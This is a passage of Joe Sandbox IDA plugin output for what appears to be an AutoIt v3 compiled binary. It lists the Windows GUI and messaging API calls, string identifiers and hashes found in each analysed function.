                                                                                                                                                          • Part of subcall function 00AFD385: GetSysColor.USER32(00000011), ref: 00AFD400
                                                                                                                                                          • Part of subcall function 00AFD385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00AFD40E
                                                                                                                                                          • Part of subcall function 00AFD385: SelectObject.GDI32(?,00000000), ref: 00AFD41F
                                                                                                                                                          • Part of subcall function 00AFD385: SetBkColor.GDI32(?,00000000), ref: 00AFD428
                                                                                                                                                          • Part of subcall function 00AFD385: SelectObject.GDI32(?,?), ref: 00AFD435
                                                                                                                                                          • Part of subcall function 00AFD385: InflateRect.USER32(?,000000FF,000000FF), ref: 00AFD454
                                                                                                                                                          • Part of subcall function 00AFD385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00AFD46B
                                                                                                                                                          • Part of subcall function 00AFD385: GetWindowLongW.USER32(00000000,000000F0), ref: 00AFD480
                                                                                                                                                          • Part of subcall function 00AFD385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00AFD4A8
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3521893082-0
                                                                                                                                                        • Opcode ID: 1b2ce8df4ec3db575beedf84141efdacd2f4d2db0e1871ac8f60c0d0be9385ab
                                                                                                                                                        • Instruction ID: 43981bdc3efab0ab6491cb012e8db46238192b20cf5fceadac71b84b53072913
                                                                                                                                                        • Opcode Fuzzy Hash: 1b2ce8df4ec3db575beedf84141efdacd2f4d2db0e1871ac8f60c0d0be9385ab
                                                                                                                                                        • Instruction Fuzzy Hash: 2A918072008305BFC7119F64DC08EAB7BAAFF89320F504A19FA62A71E0DB75D944CB52
                                                                                                                                                        APIs
                                                                                                                                                        • DestroyWindow.USER32(00000000), ref: 00AEA42A
                                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00AEA4E9
                                                                                                                                                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00AEA527
                                                                                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00AEA539
                                                                                                                                                        • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00AEA57F
                                                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 00AEA58B
                                                                                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00AEA5CF
                                                                                                                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00AEA5DE
                                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00AEA5EE
                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00AEA5F2
                                                                                                                                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00AEA602
                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00AEA60B
                                                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00AEA614
                                                                                                                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00AEA642
                                                                                                                                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 00AEA659
                                                                                                                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00AEA694
                                                                                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00AEA6A8
                                                                                                                                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 00AEA6B9
                                                                                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00AEA6E9
                                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00AEA6F4
                                                                                                                                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00AEA6FF
                                                                                                                                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00AEA709
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                        • API String ID: 2910397461-517079104
                                                                                                                                                        • Opcode ID: 0dd9bcad48b83608cfb513bffdc2a4b522b9fd97a258c8c67e9877a16fe19f2f
                                                                                                                                                        • Instruction ID: 0bb073e0745a0ebc1031e239ce3d6e92ed1449a3ec959fb1425170b5021cd54c
                                                                                                                                                        • Opcode Fuzzy Hash: 0dd9bcad48b83608cfb513bffdc2a4b522b9fd97a258c8c67e9877a16fe19f2f
                                                                                                                                                        • Instruction Fuzzy Hash: 7FA17071A00215BFEB14DBA9DD4AFAE7BB9EB44711F008555F614EB2E0DBB0AD40CB60
                                                                                                                                                        APIs
                                                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00ADE45E
                                                                                                                                                        • GetDriveTypeW.KERNEL32(?,00B2DC88,?,\\.\,00B2DBF0), ref: 00ADE54B
                                                                                                                                                        • SetErrorMode.KERNEL32(00000000,00B2DC88,?,\\.\,00B2DBF0), ref: 00ADE6B1
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorMode$DriveType
                                                                                                                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                        • API String ID: 2907320926-4222207086
                                                                                                                                                        • Opcode ID: a99dd56393d1e0e62b8150efd8829934fc3493c1de01e67108015c6edcf8f279
                                                                                                                                                        • Instruction ID: 25d41faca3a50b036e1525b635323de7b8afa6a4ca38cede801ac73139356fd6
                                                                                                                                                        • Opcode Fuzzy Hash: a99dd56393d1e0e62b8150efd8829934fc3493c1de01e67108015c6edcf8f279
                                                                                                                                                        • Instruction Fuzzy Hash: 9651B330208341ABC600FF14C9D1969B7F1EBA4B44B64895BF447AF3E2DB60DF45EA42
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __wcsnicmp
                                                                                                                                                        • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                                                        • API String ID: 1038674560-86951937
                                                                                                                                                        • Opcode ID: fbe6c88d35a7c851c2b9771fb04ed8cd7a3c8dabb9c94a0e9cbd5f42263cc782
                                                                                                                                                        • Instruction ID: 64252625bfc45a6d79bc1907b212cc2475de204a495fc6a5f3ae00d06746d538
                                                                                                                                                        • Opcode Fuzzy Hash: fbe6c88d35a7c851c2b9771fb04ed8cd7a3c8dabb9c94a0e9cbd5f42263cc782
                                                                                                                                                        • Instruction Fuzzy Hash: D7613631740B217BDF21EB64AD82FBA33ECAF15750F144065F846AA5D7EBA0DA01C7A1
                                                                                                                                                        APIs
                                                                                                                                                        • DestroyWindow.USER32 ref: 00A94956
                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00A94998
                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00A949A3
                                                                                                                                                        • DestroyCursor.USER32(00000000), ref: 00A949AE
                                                                                                                                                        • DestroyWindow.USER32(00000000), ref: 00A949B9
                                                                                                                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 00B0E179
                                                                                                                                                        • 6F550200.COMCTL32(?,000000FF,?), ref: 00B0E1B2
                                                                                                                                                        • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 00B0E5E0
                                                                                                                                                          • Part of subcall function 00A949CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A94954,00000000), ref: 00A94A23
                                                                                                                                                        • SendMessageW.USER32 ref: 00B0E627
                                                                                                                                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00B0E63E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DestroyMessageSendWindow$DeleteObject$CursorF550200InvalidateMoveRect
                                                                                                                                                        • String ID: 0
                                                                                                                                                        • API String ID: 2586706302-4108050209
                                                                                                                                                        • Opcode ID: 2978a88501becf36cae65cfa2c12de27e966714b0058d41c52d0ee35c092863b
                                                                                                                                                        • Instruction ID: 3fc1a4552afdd381dc3c70f51ce26b04ad19cd12aaa3f6d34fd95b77971ee4ad
                                                                                                                                                        • Opcode Fuzzy Hash: 2978a88501becf36cae65cfa2c12de27e966714b0058d41c52d0ee35c092863b
                                                                                                                                                        • Instruction Fuzzy Hash: 62128030604201DFDB25CF14C984BAABBE5FF59304F5449A9F9A9DB2A2C731EC46CB91
                                                                                                                                                        APIs
                                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 00AFC598
                                                                                                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00AFC64E
                                                                                                                                                        • SendMessageW.USER32(?,00001102,00000002,?), ref: 00AFC669
                                                                                                                                                        • SendMessageW.USER32(?,000000F1,?,00000000), ref: 00AFC925
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$Window
                                                                                                                                                        • String ID: 0
                                                                                                                                                        • API String ID: 2326795674-4108050209
                                                                                                                                                        • Opcode ID: dc0807bb2f47948effd594cf3adb2dd4a68d1e5f47932a340e444eb2c81d6b8b
                                                                                                                                                        • Instruction ID: 8162d441dad675f82b40abd5c19ace9c93693767cba471fd027f812c2f10f195
                                                                                                                                                        • Opcode Fuzzy Hash: dc0807bb2f47948effd594cf3adb2dd4a68d1e5f47932a340e444eb2c81d6b8b
                                                                                                                                                        • Instruction Fuzzy Hash: 3FF1027110430DAFE721DF65CA84BBABBE5FF493A4F044A29F688932A1C774D840DB91
                                                                                                                                                        APIs
                                                                                                                                                        • CharUpperBuffW.USER32(?,?,00B2DBF0), ref: 00AF6245
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: BuffCharUpper
                                                                                                                                                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                                                        • API String ID: 3964851224-45149045
                                                                                                                                                        • Opcode ID: 237645b647b01f5e65b2bdec72908c0de830b06b1294831e5ebd93f52f043b08
                                                                                                                                                        • Instruction ID: 18874fa0ea75c14db6a58331a9ef4dbb2d21705134f08d10051f12147d351720
                                                                                                                                                        • Opcode Fuzzy Hash: 237645b647b01f5e65b2bdec72908c0de830b06b1294831e5ebd93f52f043b08
                                                                                                                                                        • Instruction Fuzzy Hash: 28C191342042058FCB08EF94C651B7E77E6AF99394F04486CF9869B3D6CB24DD0ACB82
                                                                                                                                                        APIs
                                                                                                                                                        • GetSysColor.USER32(00000012), ref: 00AFD3BE
                                                                                                                                                        • SetTextColor.GDI32(?,?), ref: 00AFD3C2
                                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00AFD3D8
                                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 00AFD3E3
                                                                                                                                                        • CreateSolidBrush.GDI32(?), ref: 00AFD3E8
                                                                                                                                                        • GetSysColor.USER32(00000011), ref: 00AFD400
                                                                                                                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00AFD40E
                                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00AFD41F
                                                                                                                                                        • SetBkColor.GDI32(?,00000000), ref: 00AFD428
                                                                                                                                                        • SelectObject.GDI32(?,?), ref: 00AFD435
                                                                                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00AFD454
                                                                                                                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00AFD46B
                                                                                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00AFD480
                                                                                                                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00AFD4A8
                                                                                                                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00AFD4CF
                                                                                                                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 00AFD4ED
                                                                                                                                                        • DrawFocusRect.USER32(?,?), ref: 00AFD4F8
                                                                                                                                                        • GetSysColor.USER32(00000011), ref: 00AFD506
                                                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00AFD50E
                                                                                                                                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00AFD522
                                                                                                                                                        • SelectObject.GDI32(?,00AFD0B5), ref: 00AFD539
                                                                                                                                                        • DeleteObject.GDI32(?), ref: 00AFD544
                                                                                                                                                        • SelectObject.GDI32(?,?), ref: 00AFD54A
                                                                                                                                                        • DeleteObject.GDI32(?), ref: 00AFD54F
                                                                                                                                                        • SetTextColor.GDI32(?,?), ref: 00AFD555
                                                                                                                                                        • SetBkColor.GDI32(?,?), ref: 00AFD55F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1996641542-0
                                                                                                                                                        • Opcode ID: 121d2cd4d000647a2263f6695ca46ce17073d074dc89572947670724f0116e0a
                                                                                                                                                        • Instruction ID: 2e4238f9b1c9f3323ef2f57c0496be0d818a6ec8069aeee6ccba08ddb8c7bde7
                                                                                                                                                        • Opcode Fuzzy Hash: 121d2cd4d000647a2263f6695ca46ce17073d074dc89572947670724f0116e0a
                                                                                                                                                        • Instruction Fuzzy Hash: EF512C71900218BFDF119FA8DC48EEE7BBAFB48320F508515FA15AB2A1DB759A40DB50
                                                                                                                                                        APIs
                                                                                                                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00AFB5C0
                                                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00AFB5D1
                                                                                                                                                        • CharNextW.USER32(0000014E), ref: 00AFB600
                                                                                                                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00AFB641
                                                                                                                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00AFB657
                                                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00AFB668
                                                                                                                                                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00AFB685
                                                                                                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00AFB6D7
                                                                                                                                                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00AFB6ED
                                                                                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00AFB71E
                                                                                                                                                        • _memset.LIBCMT ref: 00AFB743
                                                                                                                                                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00AFB78C
                                                                                                                                                        • _memset.LIBCMT ref: 00AFB7EB
                                                                                                                                                        • SendMessageW.USER32 ref: 00AFB815
                                                                                                                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 00AFB86D
                                                                                                                                                        • SendMessageW.USER32(?,0000133D,?,?), ref: 00AFB91A
                                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00AFB93C
                                                                                                                                                        • GetMenuItemInfoW.USER32(?), ref: 00AFB986
                                                                                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00AFB9B3
                                                                                                                                                        • DrawMenuBar.USER32(?), ref: 00AFB9C2
                                                                                                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00AFB9EA
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                                                        • String ID: 0
                                                                                                                                                        • API String ID: 1073566785-4108050209
                                                                                                                                                        • Opcode ID: f378a59dcc0cff237804f0ddec12e5f0908ba5adc44a7019416bd2d4ec32bc9e
                                                                                                                                                        • Instruction ID: 6f1dbce223095ecc4b3cc41a724b0eb16557edcd830eec1ece25cc651ad5c7d3
                                                                                                                                                        • Opcode Fuzzy Hash: f378a59dcc0cff237804f0ddec12e5f0908ba5adc44a7019416bd2d4ec32bc9e
                                                                                                                                                        • Instruction Fuzzy Hash: 47E1597591021CAFDB219F94CC84EFE7BB8EF05750F108156FA1AAB291DB748A41DF60
                                                                                                                                                        APIs
                                                                                                                                                        • GetCursorPos.USER32(?), ref: 00AF7587
                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00AF759C
                                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00AF75A3
                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00AF7605
                                                                                                                                                        • DestroyWindow.USER32(?), ref: 00AF7631
                                                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00AF765A
                                                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AF7678
                                                                                                                                                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00AF769E
                                                                                                                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 00AF76B3
                                                                                                                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00AF76C6
                                                                                                                                                        • IsWindowVisible.USER32(?), ref: 00AF76E6
                                                                                                                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00AF7701
                                                                                                                                                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00AF7715
                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00AF772D
                                                                                                                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00AF7753
                                                                                                                                                        • GetMonitorInfoW.USER32 ref: 00AF776D
                                                                                                                                                        • CopyRect.USER32(?,?), ref: 00AF7784
                                                                                                                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 00AF77EF
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                        • String ID: ($0$tooltips_class32
                                                                                                                                                        • API String ID: 698492251-4156429822
                                                                                                                                                        • Opcode ID: f5d7b6772d880b077074113cc27ac697aa1dfa3324a6ec3538e82f87503666d2
                                                                                                                                                        • Instruction ID: 338c868e363683a9b6e28cd182664d6c3b323f0139293074de7f12493032396b
                                                                                                                                                        • Opcode Fuzzy Hash: f5d7b6772d880b077074113cc27ac697aa1dfa3324a6ec3538e82f87503666d2
                                                                                                                                                        • Instruction Fuzzy Hash: 96B16B71608345AFDB44DFA8C948B6EBBE5FF88310F00891DF6999B291DB74E805CB91
                                                                                                                                                        APIs
                                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00AAA839
                                                                                                                                                        • GetSystemMetrics.USER32(00000007), ref: 00AAA841
                                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00AAA86C
                                                                                                                                                        • GetSystemMetrics.USER32(00000008), ref: 00AAA874
                                                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 00AAA899
                                                                                                                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00AAA8B6
                                                                                                                                                        • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 00AAA8C6
                                                                                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00AAA8F9
                                                                                                                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00AAA90D
                                                                                                                                                        • GetClientRect.USER32(00000000,000000FF), ref: 00AAA92B
                                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00AAA947
                                                                                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00AAA952
                                                                                                                                                          • Part of subcall function 00AAB736: GetCursorPos.USER32(000000FF), ref: 00AAB749
                                                                                                                                                          • Part of subcall function 00AAB736: ScreenToClient.USER32(00000000,000000FF), ref: 00AAB766
                                                                                                                                                          • Part of subcall function 00AAB736: GetAsyncKeyState.USER32(00000001), ref: 00AAB78B
                                                                                                                                                          • Part of subcall function 00AAB736: GetAsyncKeyState.USER32(00000002), ref: 00AAB799
                                                                                                                                                        • SetTimer.USER32(00000000,00000000,00000028,00AAACEE), ref: 00AAA979
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                        • String ID: AutoIt v3 GUI
                                                                                                                                                        • API String ID: 1458621304-248962490
                                                                                                                                                        • Opcode ID: 493fc18df910c8f6a6df2dad0b65732bdfa7168df14100cb1dae03355a6d4fa4
                                                                                                                                                        • Instruction ID: 89489342781c269393175b33b23d0c50d1abc7b77f890270bb8df0bccaec8e8a
                                                                                                                                                        • Opcode Fuzzy Hash: 493fc18df910c8f6a6df2dad0b65732bdfa7168df14100cb1dae03355a6d4fa4
                                                                                                                                                        • Instruction Fuzzy Hash: 1EB15731A0020AAFDB24DFA8CD85BAE7BF5FB18315F108669FA15A72D0DB74D801CB51
                                                                                                                                                        APIs
                                                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00AF6A52
                                                                                                                                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00AF6B12
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: BuffCharMessageSendUpper
                                                                                                                                                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                        • API String ID: 3974292440-719923060
                                                                                                                                                        • Opcode ID: dc998542a2093697bd27ba92ad50b3fb8e3204c7e4f17d1e67779d315aaf00bd
                                                                                                                                                        • Instruction ID: 8b413cd7f9af3604f0bc08d20df0f38349cc4f83262a0afcbb975d78259395cf
                                                                                                                                                        • Opcode Fuzzy Hash: dc998542a2093697bd27ba92ad50b3fb8e3204c7e4f17d1e67779d315aaf00bd
                                                                                                                                                        • Instruction Fuzzy Hash: A1A18E302046059FCB08EF64CA51B7AB3E5FF85364F148969F9A69B2D2DB34ED06CB41
                                                                                                                                                        APIs
                                                                                                                                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 00ACE6E1
                                                                                                                                                        • _wcscmp.LIBCMT ref: 00ACE6F2
                                                                                                                                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 00ACE71A
                                                                                                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 00ACE737
                                                                                                                                                        • _wcscmp.LIBCMT ref: 00ACE755
                                                                                                                                                        • _wcsstr.LIBCMT ref: 00ACE766
                                                                                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00ACE79E
                                                                                                                                                        • _wcscmp.LIBCMT ref: 00ACE7AE
                                                                                                                                                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 00ACE7D5
                                                                                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00ACE81E
                                                                                                                                                        • _wcscmp.LIBCMT ref: 00ACE82E
                                                                                                                                                        • GetClassNameW.USER32(00000010,?,00000400), ref: 00ACE856
                                                                                                                                                        • GetWindowRect.USER32(00000004,?), ref: 00ACE8BF
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                                                        • String ID: @$ThumbnailClass
                                                                                                                                                        • API String ID: 1788623398-1539354611
                                                                                                                                                        • Opcode ID: 471c5384f9cb6ec7cad3710a29b8fa8033ddba0cfc41ec9d3be5ddc56bd3c4cc
                                                                                                                                                        • Instruction ID: 66435ec029360c130459caa74fb82ca8fe20fb57ff7fbbbc8b10859b6f14cb23
                                                                                                                                                        • Opcode Fuzzy Hash: 471c5384f9cb6ec7cad3710a29b8fa8033ddba0cfc41ec9d3be5ddc56bd3c4cc
                                                                                                                                                        • Instruction Fuzzy Hash: F881AE311083499BDB15CF24C985FAABBE8FF44754F04846EFD899A092EB30DD46CBA1
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __wcsnicmp
